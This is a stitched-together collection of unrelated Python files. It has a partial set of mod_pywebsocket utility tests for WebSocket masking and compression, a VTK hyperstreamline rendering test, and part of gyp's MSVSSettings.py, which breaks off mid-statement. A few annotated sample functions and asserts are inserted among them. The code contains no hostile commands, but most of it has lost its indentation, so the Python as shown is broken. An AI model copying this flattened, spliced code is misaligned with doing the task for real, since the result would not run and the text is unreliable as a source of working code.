result = masker.mask('\x00\x00\x00\x00\x00')
self.assertEqual('\x00\x7f\xff\x20\x00', result)
# mask[2], mask[0], ... will be used for the next call.
result = masker.mask('\x00\x00\x00\x00\x00')
self.assertEqual('\x7f\xff\x20\x00\x7f', result)
def test_mask_large_data(self):
masker = util.RepeatedXorMasker('mASk')
original = ''.join([chr(i % 256) for i in xrange(1000)])
result = masker.mask(original)
expected = ''.join(
[chr((i % 256) ^ ord('mASk'[i % 4])) for i in xrange(1000)])
self.assertEqual(expected, result)
masker = util.RepeatedXorMasker('MaSk')
first_part = 'The WebSocket Protocol enables two-way communication.'
result = masker.mask(first_part)
self.assertEqual(
'\x19\t6K\x1a\x0418"\x028\x0e9A\x03\x19"\x15<\x08"\rs\x0e#'
'\x001\x07(\x12s\x1f:\x0e~\x1c,\x18s\x08"\x0c>\x1e#\x080\n9'
'\x08<\x05c',
result)
second_part = 'It has two parts: a handshake and the data transfer.'
result = masker.mask(second_part)
self.assertEqual(
"('K%\x00 K9\x16<K=\x00!\x1f>[s\nm\t2\x05)\x12;\n&\x04s\n#"
"\x05s\x1f%\x04s\x0f,\x152K9\x132\x05>\x076\x19c",
result)
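# The behavior under test is the masking transform from RFC 6455: each
# payload octet is XORed with the masking key repeated cyclically. A
# standalone reference sketch (illustrative, not part of mod_pywebsocket):
def simple_mask(payload, masking_key):
    return ''.join(chr(ord(ch) ^ ord(masking_key[i % len(masking_key)]))
                   for i, ch in enumerate(payload))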
def get_random_section(source, min_num_chunks):
chunks = []
bytes_chunked = 0
while bytes_chunked < len(source):
chunk_size = random.randint(
1,
min(len(source) / min_num_chunks, len(source) - bytes_chunked))
chunk = source[bytes_chunked:bytes_chunked + chunk_size]
chunks.append(chunk)
bytes_chunked += chunk_size
return chunks
class InflaterDeflaterTest(unittest.TestCase):
"""A unittest for _Inflater and _Deflater class."""
def test_inflate_deflate_default(self):
input = b'hello' + '-' * 30000 + b'hello'
inflater15 = util._Inflater(15)
deflater15 = util._Deflater(15)
inflater8 = util._Inflater(8)
deflater8 = util._Deflater(8)
compressed15 = deflater15.compress_and_finish(input)
compressed8 = deflater8.compress_and_finish(input)
inflater15.append(compressed15)
inflater8.append(compressed8)
self.assertNotEqual(compressed15, compressed8)
self.assertEqual(input, inflater15.decompress(-1))
self.assertEqual(input, inflater8.decompress(-1))
def test_random_section(self):
random.seed(a=0)
source = ''.join(
[chr(random.randint(0, 255)) for i in xrange(100 * 1024)])
chunked_input = get_random_section(source, 10)
print "Input chunk sizes: %r" % [len(c) for c in chunked_input]
deflater = util._Deflater(15)
compressed = []
for chunk in chunked_input:
compressed.append(deflater.compress(chunk))
compressed.append(deflater.compress_and_finish(''))
chunked_expectation = get_random_section(source, 10)
print ("Expectation chunk sizes: %r" %
[len(c) for c in chunked_expectation])
inflater = util._Inflater(15)
inflater.append(''.join(compressed))
for chunk in chunked_expectation:
decompressed = inflater.decompress(len(chunk))
self.assertEqual(chunk, decompressed)
self.assertEqual('', inflater.decompress(-1))
if __name__ == '__main__':
unittest.main()
# vi:sts=4 sw=4 et
#!/usr/bin/env python
# Source: sankhesh/VTK Filters/Modeling/Testing/Python/Hyper.py
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
# Create the RenderWindow, Renderer and interactive renderer
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
VTK_INTEGRATE_BOTH_DIRECTIONS = 2
#
# generate tensors
ptLoad = vtk.vtkPointLoad()
ptLoad.SetLoadValue(100.0)
ptLoad.SetSampleDimensions(20, 20, 20)
ptLoad.ComputeEffectiveStressOn()
ptLoad.SetModelBounds(-10, 10, -10, 10, -10, 10)
#
# If the current directory is writable, then test the writers
#
try:
channel = open("wSP.vtk", "wb")
channel.close()
wSP = vtk.vtkDataSetWriter()
wSP.SetInputConnection(ptLoad.GetOutputPort())
wSP.SetFileName("wSP.vtk")
wSP.SetTensorsName("pointload")
wSP.SetScalarsName("effective_stress")
wSP.Write()
rSP = vtk.vtkDataSetReader()
rSP.SetFileName("wSP.vtk")
rSP.SetTensorsName("pointload")
rSP.SetScalarsName("effective_stress")
rSP.Update()
input = rSP.GetOutput()
# cleanup
#
try:
os.remove("wSP.vtk")
except OSError:
pass
except IOError:
print("Unable to test the writer/reader.")
input = ptLoad.GetOutput()
# Generate hyperstreamlines
s1 = vtk.vtkHyperStreamline()
s1.SetInputData(input)
s1.SetStartPosition(9, 9, -9)
s1.IntegrateMinorEigenvector()
s1.SetMaximumPropagationDistance(18.0)
s1.SetIntegrationStepLength(0.1)
s1.SetStepLength(0.01)
s1.SetRadius(0.25)
s1.SetNumberOfSides(18)
s1.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s1.Update()
# Map hyperstreamlines
lut = vtk.vtkLogLookupTable()
lut.SetHueRange(.6667, 0.0)
s1Mapper = vtk.vtkPolyDataMapper()
s1Mapper.SetInputConnection(s1.GetOutputPort())
s1Mapper.SetLookupTable(lut)
# force update for scalar range
ptLoad.Update()
s1Mapper.SetScalarRange(ptLoad.GetOutput().GetScalarRange())
s1Actor = vtk.vtkActor()
s1Actor.SetMapper(s1Mapper)
s2 = vtk.vtkHyperStreamline()
s2.SetInputData(input)
s2.SetStartPosition(-9, -9, -9)
s2.IntegrateMinorEigenvector()
s2.SetMaximumPropagationDistance(18.0)
s2.SetIntegrationStepLength(0.1)
s2.SetStepLength(0.01)
s2.SetRadius(0.25)
s2.SetNumberOfSides(18)
s2.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s2.Update()
s2Mapper = vtk.vtkPolyDataMapper()
s2Mapper.SetInputConnection(s2.GetOutputPort())
s2Mapper.SetLookupTable(lut)
s2Mapper.SetScalarRange(input.GetScalarRange())
s2Actor = vtk.vtkActor()
s2Actor.SetMapper(s2Mapper)
s3 = vtk.vtkHyperStreamline()
s3.SetInputData(input)
s3.SetStartPosition(9, -9, -9)
s3.IntegrateMinorEigenvector()
s3.SetMaximumPropagationDistance(18.0)
s3.SetIntegrationStepLength(0.1)
s3.SetStepLength(0.01)
s3.SetRadius(0.25)
s3.SetNumberOfSides(18)
s3.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s3.Update()
s3Mapper = vtk.vtkPolyDataMapper()
s3Mapper.SetInputConnection(s3.GetOutputPort())
s3Mapper.SetLookupTable(lut)
s3Mapper.SetScalarRange(input.GetScalarRange())
s3Actor = vtk.vtkActor()
s3Actor.SetMapper(s3Mapper)
s4 = vtk.vtkHyperStreamline()
s4.SetInputData(input)
s4.SetStartPosition(-9, 9, -9)
s4.IntegrateMinorEigenvector()
s4.SetMaximumPropagationDistance(18.0)
s4.SetIntegrationStepLength(0.1)
s4.SetStepLength(0.01)
s4.SetRadius(0.25)
s4.SetNumberOfSides(18)
s4.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
s4.Update()
s4Mapper = vtk.vtkPolyDataMapper()
s4Mapper.SetInputConnection(s4.GetOutputPort())
s4Mapper.SetLookupTable(lut)
s4Mapper.SetScalarRange(input.GetScalarRange())
s4Actor = vtk.vtkActor()
s4Actor.SetMapper(s4Mapper)
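# Illustrative refactor (not used below): the four streamline blocks above
# differ only in their start position and could be built with a helper.
def make_streamline_actor(start_position):
    s = vtk.vtkHyperStreamline()
    s.SetInputData(input)
    s.SetStartPosition(start_position[0], start_position[1], start_position[2])
    s.IntegrateMinorEigenvector()
    s.SetMaximumPropagationDistance(18.0)
    s.SetIntegrationStepLength(0.1)
    s.SetStepLength(0.01)
    s.SetRadius(0.25)
    s.SetNumberOfSides(18)
    s.SetIntegrationDirection(VTK_INTEGRATE_BOTH_DIRECTIONS)
    s.Update()
    mapper = vtk.vtkPolyDataMapper()
    mapper.SetInputConnection(s.GetOutputPort())
    mapper.SetLookupTable(lut)
    mapper.SetScalarRange(input.GetScalarRange())
    actor = vtk.vtkActor()
    actor.SetMapper(mapper)
    return actor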
# plane for context
#
g = vtk.vtkImageDataGeometryFilter()
g.SetInputData(input)
g.SetExtent(0, 100, 0, 100, 0, 0)
g.Update()
# for scalar range
gm = vtk.vtkPolyDataMapper()
gm.SetInputConnection(g.GetOutputPort())
gm.SetScalarRange(g.GetOutput().GetScalarRange())
ga = vtk.vtkActor()
ga.SetMapper(gm)
# Create outline around data
#
outline = vtk.vtkOutlineFilter()
outline.SetInputData(input)
outlineMapper = vtk.vtkPolyDataMapper()
outlineMapper.SetInputConnection(outline.GetOutputPort())
outlineActor = vtk.vtkActor()
outlineActor.SetMapper(outlineMapper)
outlineActor.GetProperty().SetColor(0, 0, 0)
# Create cone indicating application of load
#
coneSrc = vtk.vtkConeSource()
coneSrc.SetRadius(.5)
coneSrc.SetHeight(2)
coneMap = vtk.vtkPolyDataMapper()
coneMap.SetInputConnection(coneSrc.GetOutputPort())
coneActor = vtk.vtkActor()
coneActor.SetMapper(coneMap)
coneActor.SetPosition(0, 0, 11)
coneActor.RotateY(90)
coneActor.GetProperty().SetColor(1, 0, 0)
camera = vtk.vtkCamera()
camera.SetFocalPoint(0.113766, -1.13665, -1.01919)
camera.SetPosition(-29.4886, -63.1488, 26.5807)
camera.SetViewAngle(24.4617)
camera.SetViewUp(0.17138, 0.331163, 0.927879)
camera.SetClippingRange(1, 100)
ren1.AddActor(s1Actor)
ren1.AddActor(s2Actor)
ren1.AddActor(s3Actor)
ren1.AddActor(s4Actor)
ren1.AddActor(outlineActor)
ren1.AddActor(coneActor)
ren1.AddActor(ga)
ren1.SetBackground(1.0, 1.0, 1.0)
ren1.SetActiveCamera(camera)
renWin.SetSize(300, 300)
renWin.Render()
iren.Initialize()
#iren.Start()
# Source: sss-freshbyte/blog node_modules/node-gyp/gyp/pylib/gyp/MSVSSettings.py
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
r"""Code to validate and convert settings of the Microsoft build tools.
This file contains code to validate and convert settings of the Microsoft
build tools. The function ConvertToMSBuildSettings(), ValidateMSVSSettings(),
and ValidateMSBuildSettings() are the entry points.
This file was created by comparing the projects created by Visual Studio 2008
and Visual Studio 2010 for all available settings through the user interface.
The MSBuild schemas were also considered. They are typically found in the
MSBuild install directory, e.g. c:\Program Files (x86)\MSBuild
"""
import sys
import re
# Dictionaries of settings validators. The key is the tool name, the value is
# a dictionary mapping setting names to validation functions.
_msvs_validators = {}
_msbuild_validators = {}
# A dictionary of settings converters. The key is the tool name, the value is
# a dictionary mapping setting names to conversion functions.
_msvs_to_msbuild_converters = {}
# Tool name mapping from MSVS to MSBuild.
_msbuild_name_of_tool = {}
class _Tool(object):
"""Represents a tool used by MSVS or MSBuild.
Attributes:
msvs_name: The name of the tool in MSVS.
msbuild_name: The name of the tool in MSBuild.
"""
def __init__(self, msvs_name, msbuild_name):
self.msvs_name = msvs_name
self.msbuild_name = msbuild_name
def _AddTool(tool):
"""Adds a tool to the four dictionaries used to process settings.
This only defines the tool. Each setting also needs to be added.
Args:
tool: The _Tool object to be added.
"""
_msvs_validators[tool.msvs_name] = {}
_msbuild_validators[tool.msbuild_name] = {}
_msvs_to_msbuild_converters[tool.msvs_name] = {}
_msbuild_name_of_tool[tool.msvs_name] = tool.msbuild_name
def _GetMSBuildToolSettings(msbuild_settings, tool):
"""Returns an MSBuild tool dictionary. Creates it if needed."""
return msbuild_settings.setdefault(tool.msbuild_name, {})
class _Type(object):
"""Type of settings (Base class)."""
def ValidateMSVS(self, value):
"""Verifies that the value is legal for MSVS.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSVS.
"""
def ValidateMSBuild(self, value):
"""Verifies that the value is legal for MSBuild.
Args:
value: the value to check for this type.
Raises:
ValueError if value is not valid for MSBuild.
"""
def ConvertToMSBuild(self, value):
"""Returns the MSBuild equivalent of the MSVS value given.
Args:
value: the MSVS value to convert.
Returns:
the MSBuild equivalent.
Raises:
ValueError if value is not valid.
"""
return value
class _String(_Type):
"""A setting that's just a string."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring):
raise ValueError('expected string; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
return ConvertVCMacrosToMSBuild(value)
class _StringList(_Type):
"""A settings that's a list of strings."""
def ValidateMSVS(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ValidateMSBuild(self, value):
if not isinstance(value, basestring) and not isinstance(value, list):
raise ValueError('expected string list; got %r' % value)
def ConvertToMSBuild(self, value):
# Convert the macros
if isinstance(value, list):
return [ConvertVCMacrosToMSBuild(i) for i in value]
else:
return ConvertVCMacrosToMSBuild(value)
class _Boolean(_Type):
"""Boolean settings, can have the values 'false' or 'true'."""
def _Validate(self, value):
if value != 'true' and value != 'false':
raise ValueError('expected bool; got %r' % value)
def ValidateMSVS(self, value):
self._Validate(value)
def ValidateMSBuild(self, value):
self._Validate(value)
def ConvertToMSBuild(self, value):
self._Validate(value)
return value
class _Integer(_Type):
"""Integer settings."""
def __init__(self, msbuild_base=10):
_Type.__init__(self)
self._msbuild_base = msbuild_base
def ValidateMSVS(self, value):
# Try to convert, this will raise ValueError if invalid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
# Try to convert, this will raise ValueError if invalid.
int(value, self._msbuild_base)
def ConvertToMSBuild(self, value):
msbuild_format = (self._msbuild_base == 10) and '%d' or '0x%04x'
return msbuild_format % int(value)
class _Enumeration(_Type):
"""Type of settings that is an enumeration.
In MSVS, the values are indexes like '0', '1', and '2'.
MSBuild uses text labels that are more representative, like 'Win32'.
Constructor args:
label_list: an array of MSBuild labels that correspond to the MSVS index.
In the rare cases where MSVS has skipped an index value, None is
used in the array to indicate the unused spot.
new: an array of labels that are new to MSBuild.
"""
def __init__(self, label_list, new=None):
_Type.__init__(self)
self._label_list = label_list
self._msbuild_values = set(value for value in label_list
if value is not None)
if new is not None:
self._msbuild_values.update(new)
def ValidateMSVS(self, value):
# Try to convert. It will raise an exception if not valid.
self.ConvertToMSBuild(value)
def ValidateMSBuild(self, value):
if value not in self._msbuild_values:
raise ValueError('unrecognized enumerated value %s' % value)
def ConvertToMSBuild(self, value):
index = int(value)
if index < 0 or index >= len(self._label_list):
raise ValueError('index value (%d) not in expected range [0, %d)' %
(index, len(self._label_list)))
label = self._label_list[index]
if label is None:
raise ValueError('converted value for %s not specified.' % value)
return label
# Instantiate the various generic types.
_boolean = _Boolean()
_integer = _Integer()
# For now, we don't do any special validation on these types:
_string = _String()
_file_name = _String()
_folder_name = _String()
_file_list = _StringList()
_folder_list = _StringList()
_string_list = _StringList()
# Some boolean settings went from numerical values to boolean. The
# mapping is 0: default, 1: false, 2: true.
_newly_boolean = _Enumeration(['', 'false', 'true'])
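# Illustrative check (not in the original): under the 0/1/2 convention
# above, the MSVS index '2' converts to the MSBuild label 'true'.
assert _newly_boolean.ConvertToMSBuild('2') == 'true'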
def _Same(tool, name, setting_type):
"""Defines a setting that has the same name in MSVS and MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
_Renamed(tool, name, name, setting_type)
def _Renamed(tool, msvs_name, msbuild_name, setting_type):
"""Defines a setting for which the name has changed.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting.
msbuild_name: the name of the MSBuild setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
msbuild_tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
msbuild_tool_settings[msbuild_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_name] = setting_type.ValidateMSVS
_msbuild_validators[tool.msbuild_name][msbuild_name] = (
setting_type.ValidateMSBuild)
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _Moved(tool, settings_name, msbuild_tool_name, setting_type):
_MovedAndRenamed(tool, settings_name, msbuild_tool_name, settings_name,
setting_type)
def _MovedAndRenamed(tool, msvs_settings_name, msbuild_tool_name,
msbuild_settings_name, setting_type):
"""Defines a setting that may have moved to a new section.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_settings_name: the MSVS name of the setting.
msbuild_tool_name: the name of the MSBuild tool to place the setting under.
msbuild_settings_name: the MSBuild name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
tool_settings = msbuild_settings.setdefault(msbuild_tool_name, {})
tool_settings[msbuild_settings_name] = setting_type.ConvertToMSBuild(value)
_msvs_validators[tool.msvs_name][msvs_settings_name] = (
setting_type.ValidateMSVS)
validator = setting_type.ValidateMSBuild
_msbuild_validators[msbuild_tool_name][msbuild_settings_name] = validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_settings_name] = _Translate
def _MSVSOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSVS.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(unused_value, unused_msbuild_settings):
# Since this is for MSVS only settings, no translation will happen.
pass
_msvs_validators[tool.msvs_name][name] = setting_type.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _MSBuildOnly(tool, name, setting_type):
"""Defines a setting that is only found in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
name: the name of the setting.
setting_type: the type of this setting.
"""
def _Translate(value, msbuild_settings):
# Let msbuild-only properties get translated as-is from msvs_settings.
tool_settings = msbuild_settings.setdefault(tool.msbuild_name, {})
tool_settings[name] = value
_msbuild_validators[tool.msbuild_name][name] = setting_type.ValidateMSBuild
_msvs_to_msbuild_converters[tool.msvs_name][name] = _Translate
def _ConvertedToAdditionalOption(tool, msvs_name, flag):
"""Defines a setting that's handled via a command line option in MSBuild.
Args:
tool: a dictionary that gives the names of the tool for MSVS and MSBuild.
msvs_name: the name of the MSVS setting that if 'true' becomes a flag
flag: the flag to insert at the end of the AdditionalOptions
"""
def _Translate(value, msbuild_settings):
if value == 'true':
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if 'AdditionalOptions' in tool_settings:
new_flags = '%s %s' % (tool_settings['AdditionalOptions'], flag)
else:
new_flags = flag
tool_settings['AdditionalOptions'] = new_flags
_msvs_validators[tool.msvs_name][msvs_name] = _boolean.ValidateMSVS
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
def _CustomGeneratePreprocessedFile(tool, msvs_name):
def _Translate(value, msbuild_settings):
tool_settings = _GetMSBuildToolSettings(msbuild_settings, tool)
if value == '0':
tool_settings['PreprocessToFile'] = 'false'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '1': # /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'false'
elif value == '2': # /EP /P
tool_settings['PreprocessToFile'] = 'true'
tool_settings['PreprocessSuppressLineNumbers'] = 'true'
else:
raise ValueError('value must be one of [0, 1, 2]; got %s' % value)
# Create a bogus validator that looks for '0', '1', or '2'
msvs_validator = _Enumeration(['a', 'b', 'c']).ValidateMSVS
_msvs_validators[tool.msvs_name][msvs_name] = msvs_validator
msbuild_validator = _boolean.ValidateMSBuild
msbuild_tool_validators = _msbuild_validators[tool.msbuild_name]
msbuild_tool_validators['PreprocessToFile'] = msbuild_validator
msbuild_tool_validators['PreprocessSuppressLineNumbers'] = msbuild_validator
_msvs_to_msbuild_converters[tool.msvs_name][msvs_name] = _Translate
fix_vc_macro_slashes_regex_list = ('IntDir', 'OutDir')
fix_vc_macro_slashes_regex = re.compile(
r'(\$\((?:%s)\))(?:[\\/]+)' % "|".join(fix_vc_macro_slashes_regex_list)
)
# Regular expression to detect keys that were generated by exclusion lists
_EXCLUDED_SUFFIX_RE = re.compile('^(.*)_excluded$')
def _ValidateExclusionSetting(setting, settings, error_msg, stderr=sys.stderr):
"""Verify that 'setting' is valid if it is generated from an exclusion list.
If the setting appears to be generated from an exclusion list, the root name
is checked.
Args:
setting: A string that is the setting name to validate
settings: A dictionary where the keys are valid settings
error_msg: The message to emit in the event of error
stderr: The stream receiving the error messages.
"""
# This may be unrecognized because it's an exclusion list. If the
# setting name has the _excluded suffix, then check the root name.
unrecognized = True
m = re.match(_EXCLUDED_SUFFIX_RE, setting)
if m:
root_setting = m.group(1)
unrecognized = root_setting not in settings
if unrecognized:
# We don't know this setting. Give a warning.
print >> stderr, error_msg
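# For example (illustrative), a setting named
# 'AdditionalIncludeDirectories_excluded' is accepted here whenever
# 'AdditionalIncludeDirectories' itself is a recognized setting.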
def FixVCMacroSlashes(s):
"""Replace macros which have excessive following slashes.
These macros are known to have a built-in trailing slash. Furthermore, many
scripts hiccup on processing paths with extra slashes in the middle.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
s = fix_vc_macro_slashes_regex.sub(r'\1', s)
return s
def ConvertVCMacrosToMSBuild(s):
"""Convert the the MSVS macros found in the string to the MSBuild equivalent.
This list is probably not exhaustive. Add as needed.
"""
if '$' in s:
replace_map = {
'$(ConfigurationName)': '$(Configuration)',
'$(InputDir)': '%(RelativeDir)',
'$(InputExt)': '%(Extension)',
'$(InputFileName)': '%(Filename)%(Extension)',
'$(InputName)': '%(Filename)',
'$(InputPath)': '%(Identity)',
'$(ParentName)': '$(ProjectFileName)',
'$(PlatformName)': '$(Platform)',
'$(SafeInputName)': '%(Filename)',
}
for old, new in replace_map.iteritems():
s = s.replace(old, new)
s = FixVCMacroSlashes(s)
return s
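# Illustrative check (not in the original): the macro is renamed and the
# redundant slash after $(IntDir) is dropped.
assert (ConvertVCMacrosToMSBuild('$(IntDir)\\$(InputName).obj') ==
        '$(IntDir)%(Filename).obj')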
def ConvertToMSBuildSettings(msvs_settings, stderr=sys.stderr):
"""Converts MSVS settings (VS2008 and earlier) to MSBuild settings (VS2010+).
Args:
msvs_settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
Returns:
A dictionary of MSBuild settings. The key is either the MSBuild tool name
or the empty string (for the global settings). The values are themselves
dictionaries of settings and their values.
"""
msbuild_settings = {}
for msvs_tool_name, msvs_tool_settings in msvs_settings.iteritems():
if msvs_tool_name in _msvs_to_msbuild_converters:
msvs_tool = _msvs_to_msbuild_converters[msvs_tool_name]
for msvs_setting, msvs_value in msvs_tool_settings.iteritems():
if msvs_setting in msvs_tool:
# Invoke the translation function.
try:
msvs_tool[msvs_setting](msvs_value, msbuild_settings)
except ValueError, e:
print >> stderr, ('Warning: while converting %s/%s to MSBuild, '
'%s' % (msvs_tool_name, msvs_setting, e))
else:
_ValidateExclusionSetting(msvs_setting,
msvs_tool,
('Warning: unrecognized setting %s/%s '
'while converting to MSBuild.' %
(msvs_tool_name, msvs_setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s while converting to '
'MSBuild.' % msvs_tool_name)
return msbuild_settings
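# Illustrative example (not in the original): once the tool tables below
# are populated, a single MSVS compiler setting converts like this:
#   ConvertToMSBuildSettings({'VCCLCompilerTool': {'MinimalRebuild': 'true'}})
#   => {'ClCompile': {'MinimalRebuild': 'true'}}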
def ValidateMSVSSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSVS.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msvs_validators, settings, stderr)
def ValidateMSBuildSettings(settings, stderr=sys.stderr):
"""Validates that the names of the settings are valid for MSBuild.
Args:
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
_ValidateSettings(_msbuild_validators, settings, stderr)
def _ValidateSettings(validators, settings, stderr):
"""Validates that the settings are valid for MSBuild or MSVS.
We currently only validate the names of the settings, not their values.
Args:
validators: A dictionary of tools and their validators.
settings: A dictionary. The key is the tool name. The values are
themselves dictionaries of settings and their values.
stderr: The stream receiving the error messages.
"""
for tool_name in settings:
if tool_name in validators:
tool_validators = validators[tool_name]
for setting, value in settings[tool_name].iteritems():
if setting in tool_validators:
try:
tool_validators[setting](value)
except ValueError, e:
print >> stderr, ('Warning: for %s/%s, %s' %
(tool_name, setting, e))
else:
_ValidateExclusionSetting(setting,
tool_validators,
('Warning: unrecognized setting %s/%s' %
(tool_name, setting)),
stderr)
else:
print >> stderr, ('Warning: unrecognized tool %s' % tool_name)
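# Behavior sketch (hypothetical setting name): unknown names warn rather than
# raise, e.g. ValidateMSBuildSettings({'ClCompile': {'NoSuchSetting': '1'}})
# prints "Warning: unrecognized setting ClCompile/NoSuchSetting" to stderr
# and returns normally.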
# MSVS and MSBuild names of the tools.
_compile = _Tool('VCCLCompilerTool', 'ClCompile')
_link = _Tool('VCLinkerTool', 'Link')
_midl = _Tool('VCMIDLTool', 'Midl')
_rc = _Tool('VCResourceCompilerTool', 'ResourceCompile')
_lib = _Tool('VCLibrarianTool', 'Lib')
_manifest = _Tool('VCManifestTool', 'Manifest')
_masm = _Tool('MASM', 'MASM')
_AddTool(_compile)
_AddTool(_link)
_AddTool(_midl)
_AddTool(_rc)
_AddTool(_lib)
_AddTool(_manifest)
_AddTool(_masm)
# Add sections only found in the MSBuild settings.
_msbuild_validators[''] = {}
_msbuild_validators['ProjectReference'] = {}
_msbuild_validators['ManifestResourceCompile'] = {}
# Descriptions of the compiler options, i.e. VCCLCompilerTool in MSVS and
# ClCompile in MSBuild.
# See "c:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\1033\cl.xml" for
# the schema of the MSBuild ClCompile settings.
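# Editorial note: in the _Enumeration tables below, an MSVS enumeration value
# is a 0-based index string ('0', '1', ...) into the list, and the entry at
# that index is the MSBuild name it converts to; the None entries appear to be
# placeholders that keep the indices aligned for retired MSVS values.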
# Options that have the same name in MSVS and MSBuild
_Same(_compile, 'AdditionalIncludeDirectories', _folder_list) # /I
_Same(_compile, 'AdditionalOptions', _string_list)
_Same(_compile, 'AdditionalUsingDirectories', _folder_list) # /AI
_Same(_compile, 'AssemblerListingLocation', _file_name) # /Fa
_Same(_compile, 'BrowseInformationFile', _file_name)
_Same(_compile, 'BufferSecurityCheck', _boolean) # /GS
_Same(_compile, 'DisableLanguageExtensions', _boolean) # /Za
_Same(_compile, 'DisableSpecificWarnings', _string_list) # /wd
_Same(_compile, 'EnableFiberSafeOptimizations', _boolean) # /GT
_Same(_compile, 'EnablePREfast', _boolean) # /analyze Visible='false'
_Same(_compile, 'ExpandAttributedSource', _boolean) # /Fx
_Same(_compile, 'FloatingPointExceptions', _boolean) # /fp:except
_Same(_compile, 'ForceConformanceInForLoopScope', _boolean) # /Zc:forScope
_Same(_compile, 'ForcedIncludeFiles', _file_list) # /FI
_Same(_compile, 'ForcedUsingFiles', _file_list) # /FU
_Same(_compile, 'GenerateXMLDocumentationFiles', _boolean) # /doc
_Same(_compile, 'IgnoreStandardIncludePath', _boolean) # /X
_Same(_compile, 'MinimalRebuild', _boolean) # /Gm
_Same(_compile, 'OmitDefaultLibName', _boolean) # /Zl
_Same(_compile, 'OmitFramePointers', _boolean) # /Oy
_Same(_compile, 'PreprocessorDefinitions', _string_list) # /D
_Same(_compile, 'ProgramDataBaseFileName', _file_name) # /Fd
_Same(_compile, 'RuntimeTypeInfo', _boolean) # /GR
_Same(_compile, 'ShowIncludes', _boolean) # /showIncludes
_Same(_compile, 'SmallerTypeCheck', _boolean) # /RTCc
_Same(_compile, 'StringPooling', _boolean) # /GF
_Same(_compile, 'SuppressStartupBanner', _boolean) # /nologo
_Same(_compile, 'TreatWChar_tAsBuiltInType', _boolean) # /Zc:wchar_t
_Same(_compile, 'UndefineAllPreprocessorDefinitions', _boolean) # /u
_Same(_compile, 'UndefinePreprocessorDefinitions', _string_list) # /U
_Same(_compile, 'UseFullPaths', _boolean) # /FC
_Same(_compile, 'WholeProgramOptimization', _boolean) # /GL
_Same(_compile, 'XMLDocumentationFileName', _file_name)
_Same(_compile, 'AssemblerOutput',
_Enumeration(['NoListing',
'AssemblyCode', # /FA
'All', # /FAcs
'AssemblyAndMachineCode', # /FAc
'AssemblyAndSourceCode'])) # /FAs
_Same(_compile, 'BasicRuntimeChecks',
_Enumeration(['Default',
'StackFrameRuntimeCheck', # /RTCs
'UninitializedLocalUsageCheck', # /RTCu
'EnableFastChecks'])) # /RTC1
_Same(_compile, 'BrowseInformation',
_Enumeration(['false',
'true', # /FR
'true'])) # /Fr
_Same(_compile, 'CallingConvention',
_Enumeration(['Cdecl', # /Gd
'FastCall', # /Gr
'StdCall', # /Gz
'VectorCall'])) # /Gv
_Same(_compile, 'CompileAs',
_Enumeration(['Default',
'CompileAsC', # /TC
'CompileAsCpp'])) # /TP
_Same(_compile, 'DebugInformationFormat',
_Enumeration(['', # Disabled
'OldStyle', # /Z7
None,
'ProgramDatabase', # /Zi
'EditAndContinue'])) # /ZI
_Same(_compile, 'EnableEnhancedInstructionSet',
_Enumeration(['NotSet',
'StreamingSIMDExtensions', # /arch:SSE
'StreamingSIMDExtensions2', # /arch:SSE2
'AdvancedVectorExtensions', # /arch:AVX (vs2012+)
'NoExtensions', # /arch:IA32 (vs2012+)
# This one only exists in the new msbuild format.
'AdvancedVectorExtensions2', # /arch:AVX2 (vs2013r2+)
]))
_Same(_compile, 'ErrorReporting',
_Enumeration(['None', # /errorReport:none
'Prompt', # /errorReport:prompt
'Queue'], # /errorReport:queue
